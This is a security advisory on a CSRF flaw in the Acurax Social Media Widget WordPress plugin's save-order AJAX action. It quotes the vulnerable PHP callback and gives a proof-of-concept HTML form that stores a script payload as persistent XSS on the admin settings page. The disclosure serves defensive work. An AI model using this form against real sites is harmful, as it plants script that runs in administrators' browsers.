Description
Plugin implements AJAX action acx_asmw_saveorder which calls back the function acx_asmw_saveorder_callback. The later does not implement any
anti-CSRF controls thus allowing a malicious actor to perform an attack that could update plugin specific option social_widget_icon_array_order.
Vulnerable param is $_POST['recordsArray'] and it is saved as an option with the name social_widget_icon_array_order.
Leveraging a CSRF could lead to a Persistent XSS (see PoC). Payload will be served when a user with the right privileges visits plugin’s settings page (wp-admin/admin.php?page=Acurax-Social-Widget-Settings).
Vulnerable code is located in file acurax-social-media-widget/function.php line 993:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
function acx_asmw_saveorder_callback() { global $wpdb; $social_widget_icon_array_order = $_POST['recordsArray']; if ( current_user_can( 'manage_options' ) ) { $social_widget_icon_array_order = serialize( $social_widget_icon_array_order ); update_option( 'social_widget_icon_array_order', $social_widget_icon_array_order ); echo "<div id='acurax_notice' align='center' style='width: 420px; font-family: arial; font-weight: normal; font-size: 22px;'>"; echo "Social Media Icon's Order Saved"; echo "</div><br>"; } die(); // this is required to return a proper result } add_action( 'wp_ajax_acx_asmw_saveorder', 'acx_asmw_saveorder_callback' ); |
PoC
In this PoC we leverage the CSRF vulnerabilityt o perform a Persistent XSS attack. The payload is available in plugin’s settings.
|
1 2 3 4 5 |
<form method="post" action="http://vuln.test/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="acx_asmw_saveorder"> <input type="text" name="recordsArray[]" value="1'><script>alert(1);</script>"> <button type="submit" value="Submit">Submit</button> </form> |